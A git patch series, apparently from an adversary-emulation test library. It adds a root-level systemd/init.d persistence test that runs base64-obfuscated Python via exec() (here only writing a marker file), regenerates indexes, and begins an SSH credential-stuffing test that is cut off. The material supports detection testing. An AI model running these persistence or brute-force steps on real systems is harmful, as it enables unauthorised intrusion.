From 6a9c9ac26f2a297fb6fbcb9f01d50b4d9926111a Mon Sep 17 00:00:00 2001 From: madhavbhatt Date: Fri, 4 Jun 2021 13:58:10 -0700 Subject: [PATCH 01/84] T1543.002 : Service Creation and Modification for Ubuntu, CentOS OR Kali --- atomics/T1543.002/T1543.002.yaml | 45 ++++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) diff --git a/atomics/T1543.002/T1543.002.yaml b/atomics/T1543.002/T1543.002.yaml index 8b0a1de2..b726bd85 100644 --- a/atomics/T1543.002/T1543.002.yaml +++ b/atomics/T1543.002/T1543.002.yaml @@ -66,3 +66,48 @@ atomic_tests: systemctl daemon-reload name: bash + +- name: Create Systemd Service unit file, Enable the service , Modify and Reload the service. + description: | + This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. + + supported_platforms: + - linux + dependencies: + - description: | + System must be Ubuntu ,Kali OR CentOS. + prereq_command: | + if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi; + get_prereq_command: | + echo Please run from Ubuntu ,Kali OR CentOS. + executor: + name: bash + elevation_required: true # Indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false. + command: | # These are the actaul attack commands, at least one command must be provided. + cat > /etc/init.d/T1543.002 << EOF + #!/bin/bash + ### BEGIN INIT INFO + # Provides : Atomic Test T1543.002 + # Required-Start: $all + # Required-Stop : + # Default-Start: 2 3 4 5 + # Default-Stop: + # Short Description: Atomic Test for Systemd Service Creation + ### END INIT INFO + python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))" + EOF + + chmod +x /etc/init.d/T1543.002 + if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ; + systemctl enable T1543.002 + systemctl start T1543.002 + + echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002 + systemctl daemon-reload + systemctl restart T1543.002 + cleanup_command: | # You can remove the cleanup_command section if there are no cleanup commands. + systemctl stop T1543.002 + systemctl disable T1543.002 + rm -rf /etc/init.d/T1543.002 + systemctl daemon-reload + From 1a66af9e941ee7a42bb859741375309128ae71ff Mon Sep 17 00:00:00 2001 From: madhavbhatt Date: Fri, 4 Jun 2021 14:22:11 -0700 Subject: [PATCH 02/84] T1543.002 : Service Creation and Modification for Ubuntu, CentOS OR Kali --- atomics/T1543.002/T1543.002.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/atomics/T1543.002/T1543.002.yaml b/atomics/T1543.002/T1543.002.yaml index b726bd85..a7adda26 100644 --- a/atomics/T1543.002/T1543.002.yaml +++ b/atomics/T1543.002/T1543.002.yaml @@ -67,7 +67,7 @@ atomic_tests: name: bash -- name: Create Systemd Service unit file, Enable the service , Modify and Reload the service. +- name: Create Systemd Service file, Enable the service , Modify and Reload the service. description: | This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. @@ -82,8 +82,8 @@ atomic_tests: echo Please run from Ubuntu ,Kali OR CentOS. executor: name: bash - elevation_required: true # Indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false. - command: | # These are the actaul attack commands, at least one command must be provided. + elevation_required: true + command: | cat > /etc/init.d/T1543.002 << EOF #!/bin/bash ### BEGIN INIT INFO @@ -105,7 +105,7 @@ atomic_tests: echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002 systemctl daemon-reload systemctl restart T1543.002 - cleanup_command: | # You can remove the cleanup_command section if there are no cleanup commands. + cleanup_command: | systemctl stop T1543.002 systemctl disable T1543.002 rm -rf /etc/init.d/T1543.002 From 71a7a77e62d1067726aeceb116d0d9f2fc090483 Mon Sep 17 00:00:00 2001 From: patel-bhavin Date: Fri, 4 Jun 2021 14:30:15 -0700 Subject: [PATCH 03/84] adding kubectl to spec --- atomic_red_team/atomic_red_team.rb | 4 ++-- atomic_red_team/spec.yaml | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/atomic_red_team/atomic_red_team.rb b/atomic_red_team/atomic_red_team.rb index 24a4c811..f7b63964 100755 --- a/atomic_red_team/atomic_red_team.rb +++ b/atomic_red_team/atomic_red_team.rb @@ -142,7 +142,7 @@ class AtomicRedTeam raise("`atomic_tests[#{i}].executor.name` element must be a string") unless executor['name'].is_a?(String) raise("`atomic_tests[#{i}].executor.name` element must be lowercased and underscored (was #{executor['name']})") unless executor['name'] =~ /[a-z_]+/ - valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud'] + valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud', 'kubectl'] case executor['name'] when 'manual' raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps') @@ -152,7 +152,7 @@ class AtomicRedTeam string: executor['steps'], string_description: "atomic_tests[#{i}].executor.steps" - when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud' + when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud', 'kubectl' raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command') raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String) diff --git a/atomic_red_team/spec.yaml b/atomic_red_team/spec.yaml index 9ccd2b42..7f34d392 100644 --- a/atomic_red_team/spec.yaml +++ b/atomic_red_team/spec.yaml @@ -115,7 +115,7 @@ atomic_tests: # a list of executors that can execute the attack commands of this atomic test. There are almost always going to be one of these # per test, but there are cases where you may have multiple - for example, separate executors for `sh` # and `bash` when working on linux OSes. - # Names of cloud/container specific runtimes can also be used, such as `aws`, `az`, and `gcloud`. + # Names of cloud/container specific runtimes can also be used, such as `aws`, `az`, `gcloud` and `kubectl`. executors: # the name of the executor describes the framework or application in which the test should be executed. # From 6214334306f61550deb56f747ffeb3947d7a0b9e Mon Sep 17 00:00:00 2001 From: madhavbhatt Date: Fri, 4 Jun 2021 14:30:48 -0700 Subject: [PATCH 04/84] Rolling back changes in md file to meet master branch --- atomics/T1543.002/T1543.002.md | 64 ---------------------------------- 1 file changed, 64 deletions(-) diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md index 6f2f4e4b..9ea9b5f2 100644 --- a/atomics/T1543.002/T1543.002.md +++ b/atomics/T1543.002/T1543.002.md @@ -16,8 +16,6 @@ While adversaries typically require root privileges to create/modify service uni - [Atomic Test #1 - Create Systemd Service](#atomic-test-1---create-systemd-service) -- [Atomic Test #2 - Create Systemd Service unit file, Enable the service , Modify and Reload the service.](#atomic-test-2---create-systemd-service-unit-file--enable-the-service--modify-and-reload-the-service) -
@@ -77,67 +75,5 @@ systemctl daemon-reload -

-## Atomic Test #2 - Create Systemd Service unit file, Enable the service , Modify and Reload the service. -This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. - -**Supported Platforms:** Linux - - - - - -#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) - - -```bash -cat > /etc/init.d/T1543.002 << EOF -#!/bin/bash -### BEGIN INIT INFO -# Provides : Atomic Test T1543.002 -# Required-Start: $all -# Required-Stop : -# Default-Start: 2 3 4 5 -# Default-Stop: -# Short Description: Atomic Test for Systemd Service Creation -### END INIT INFO -python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))" -EOF - -chmod +x /etc/init.d/T1543.002 -if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ; -systemctl enable T1543.002 -systemctl start T1543.002 - -echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002 -systemctl daemon-reload -systemctl restart T1543.002 -``` - -#### Cleanup Commands: -```bash -systemctl stop T1543.002 -systemctl disable T1543.002 -rm -rf /etc/init.d/T1543.002 -systemctl daemon-reload -``` - - - -#### Dependencies: Run with `bash`! -##### Description: System must be Ubuntu ,Kali OR CentOS. -##### Check Prereq Commands: -```bash -if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi; -``` -##### Get Prereq Commands: -```bash -echo Please run these atomic tests from Ubuntu ,Kali OR CentOS. -``` - - - - -
From 22d753d55ba0e0a675ccab01422859c104fda390 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Mon, 7 Jun 2021 15:44:12 +0000 Subject: [PATCH 05/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1543.002/T1543.002.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1543.002/T1543.002.yaml b/atomics/T1543.002/T1543.002.yaml index a7adda26..393c59b4 100644 --- a/atomics/T1543.002/T1543.002.yaml +++ b/atomics/T1543.002/T1543.002.yaml @@ -68,6 +68,7 @@ atomic_tests: - name: Create Systemd Service file, Enable the service , Modify and Reload the service. + auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89 description: | This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index e9c19f64..71c27abf 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -709,3 +709,4 @@ e2d85e66-cb66-4ed7-93b1-833fc56c9319 c33f3d80-5f04-419b-a13a-854d1cbdbf3a 126f71af-e1c9-405c-94ef-26a47b16c102 da4f751a-020b-40d7-b9ff-d433b7799803 +c35ac4a8-19de-43af-b9f8-755da7e89c89 From 72c90344983e8e21789ef177ae15825a4c852f79 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 7 Jun 2021 15:44:18 +0000 Subject: [PATCH 06/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/linux-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/linux-index.md | 2 + atomics/Indexes/index.yaml | 84 +++++++++++++++++++ atomics/T1543.002/T1543.002.md | 65 ++++++++++++++ 6 files changed, 157 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index da09d5a0..ebe5a1aa 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -192,6 +192,7 @@ privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e- privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash +privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell @@ -565,6 +566,7 @@ persistence,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364 persistence,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash +persistence,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash persistence,T1505.002,Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index d7c342f8..f06859b0 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -42,6 +42,7 @@ privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e- privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash +privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh privilege-escalation,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh @@ -164,6 +165,7 @@ persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3 persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash +persistence,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh persistence,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 6c7e9586..bb1de4c0 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -370,6 +370,7 @@ - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux] - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) - Atomic Test #1: Create Systemd Service [linux] + - Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux] - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) - Atomic Test #1: Create Systemd Service and Timer [linux] - T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -1013,6 +1014,7 @@ - T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) - Atomic Test #1: Create Systemd Service [linux] + - Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux] - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) - Atomic Test #1: Create Systemd Service and Timer [linux] - T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index de2b75a9..2adc7269 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -137,6 +137,7 @@ - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux] - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) - Atomic Test #1: Create Systemd Service [linux] + - Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux] - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) - Atomic Test #1: Create Systemd Service and Timer [linux] - [T1546.005 Trap](../../T1546.005/T1546.005.md) @@ -466,6 +467,7 @@ - T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) - Atomic Test #1: Create Systemd Service [linux] + - Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux] - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) - Atomic Test #1: Create Systemd Service and Timer [linux] - T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 35161db6..ffb927c7 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -17073,6 +17073,48 @@ privilege-escalation: rm -rf #{systemd_service_path}/#{systemd_service_file} systemctl daemon-reload name: bash + - name: Create Systemd Service file, Enable the service , Modify and Reload the + service. + auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89 + description: "This test creates a systemd service unit file and enables it to + autostart on boot. Once service is created and enabled, it also modifies this + same service file showcasing both Creation and Modification of system process. + \n" + supported_platforms: + - linux + dependencies: + - description: 'System must be Ubuntu ,Kali OR CentOS. + +' + prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat + /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i + ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; + +' + get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. + +' + executor: + name: bash + elevation_required: true + command: "cat > /etc/init.d/T1543.002 << EOF\n#!/bin/bash\n### BEGIN INIT + INFO\n# Provides : Atomic Test T1543.002\n# Required-Start: $all\n# Required-Stop + : \n# Default-Start: 2 3 4 5\n# Default-Stop: \n# Short Description: Atomic + Test for Systemd Service Creation\n### END INIT INFO\npython3 -c \"import + os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))\"\nEOF\n\nchmod + +x /etc/init.d/T1543.002\nif [ $(cat /etc/os-release | grep -i ID=ubuntu) + ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 + defaults; elif [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then + chkconfig T1543.002 on ; else echo \"Please run this test on Ubnutu , kali + OR centos\" ; fi ;\nsystemctl enable T1543.002\nsystemctl start T1543.002\n\necho + \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\\\"\" + | sudo tee -a /etc/init.d/T1543.002\nsystemctl daemon-reload\nsystemctl + restart T1543.002\n" + cleanup_command: | + systemctl stop T1543.002 + systemctl disable T1543.002 + rm -rf /etc/init.d/T1543.002 + systemctl daemon-reload T1053.006: technique: id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21 @@ -44860,6 +44902,48 @@ persistence: rm -rf #{systemd_service_path}/#{systemd_service_file} systemctl daemon-reload name: bash + - name: Create Systemd Service file, Enable the service , Modify and Reload the + service. + auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89 + description: "This test creates a systemd service unit file and enables it to + autostart on boot. Once service is created and enabled, it also modifies this + same service file showcasing both Creation and Modification of system process. + \n" + supported_platforms: + - linux + dependencies: + - description: 'System must be Ubuntu ,Kali OR CentOS. + +' + prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat + /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i + ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; + +' + get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. + +' + executor: + name: bash + elevation_required: true + command: "cat > /etc/init.d/T1543.002 << EOF\n#!/bin/bash\n### BEGIN INIT + INFO\n# Provides : Atomic Test T1543.002\n# Required-Start: $all\n# Required-Stop + : \n# Default-Start: 2 3 4 5\n# Default-Stop: \n# Short Description: Atomic + Test for Systemd Service Creation\n### END INIT INFO\npython3 -c \"import + os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))\"\nEOF\n\nchmod + +x /etc/init.d/T1543.002\nif [ $(cat /etc/os-release | grep -i ID=ubuntu) + ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 + defaults; elif [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then + chkconfig T1543.002 on ; else echo \"Please run this test on Ubnutu , kali + OR centos\" ; fi ;\nsystemctl enable T1543.002\nsystemctl start T1543.002\n\necho + \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\\\"\" + | sudo tee -a /etc/init.d/T1543.002\nsystemctl daemon-reload\nsystemctl + restart T1543.002\n" + cleanup_command: | + systemctl stop T1543.002 + systemctl disable T1543.002 + rm -rf /etc/init.d/T1543.002 + systemctl daemon-reload T1053.006: technique: id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21 diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md index c9bfec54..44951c1c 100644 --- a/atomics/T1543.002/T1543.002.md +++ b/atomics/T1543.002/T1543.002.md @@ -16,6 +16,8 @@ While adversaries typically require root privileges to create/modify service uni - [Atomic Test #1 - Create Systemd Service](#atomic-test-1---create-systemd-service) +- [Atomic Test #2 - Create Systemd Service file, Enable the service , Modify and Reload the service.](#atomic-test-2---create-systemd-service-file--enable-the-service--modify-and-reload-the-service) +
@@ -75,4 +77,67 @@ systemctl daemon-reload +
+
+ +## Atomic Test #2 - Create Systemd Service file, Enable the service , Modify and Reload the service. +This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. + +**Supported Platforms:** Linux + + + + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +cat > /etc/init.d/T1543.002 << EOF +#!/bin/bash +### BEGIN INIT INFO +# Provides : Atomic Test T1543.002 +# Required-Start: $all +# Required-Stop : +# Default-Start: 2 3 4 5 +# Default-Stop: +# Short Description: Atomic Test for Systemd Service Creation +### END INIT INFO +python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))" +EOF + +chmod +x /etc/init.d/T1543.002 +if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ; +systemctl enable T1543.002 +systemctl start T1543.002 + +echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002 +systemctl daemon-reload +systemctl restart T1543.002 +``` + +#### Cleanup Commands: +```bash +systemctl stop T1543.002 +systemctl disable T1543.002 +rm -rf /etc/init.d/T1543.002 +systemctl daemon-reload +``` + + + +#### Dependencies: Run with `bash`! +##### Description: System must be Ubuntu ,Kali OR CentOS. +##### Check Prereq Commands: +```bash +if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi; +``` +##### Get Prereq Commands: +```bash +echo Please run from Ubuntu ,Kali OR CentOS. +``` + + + +
From 8b308641929003da70f18d9a70f9468a2842af86 Mon Sep 17 00:00:00 2001 From: madhavbhatt Date: Mon, 7 Jun 2021 15:17:31 -0700 Subject: [PATCH 07/84] T1110.004 : SSH Credential Stuffing FROM Linux , MacOS --- atomics/T1110.004/T1110.004.yaml | 64 +++ atomics/T1110.004/src/credstuffuserpass.txt | 482 ++++++++++++++++++++ 2 files changed, 546 insertions(+) create mode 100644 atomics/T1110.004/T1110.004.yaml create mode 100644 atomics/T1110.004/src/credstuffuserpass.txt diff --git a/atomics/T1110.004/T1110.004.yaml b/atomics/T1110.004/T1110.004.yaml new file mode 100644 index 00000000..29d8c304 --- /dev/null +++ b/atomics/T1110.004/T1110.004.yaml @@ -0,0 +1,64 @@ +--- +attack_technique: T1110.004 +display_name: 'Brute Force: Credential Stuffing' + +atomic_tests: +- name: SSH Credential Stuffing From Linux + description: | + Using username,password combination from a password dump to login over SSH. + + supported_platforms: + - linux + + input_arguments: + target_host: + description: IP Address / Hostname you want to target. + type: String + default: localhost + + dependency_executor_name: bash + dependencies: + - description: | + Requires SSHPASS + prereq_command: | + if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; + get_prereq_command: | + if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install 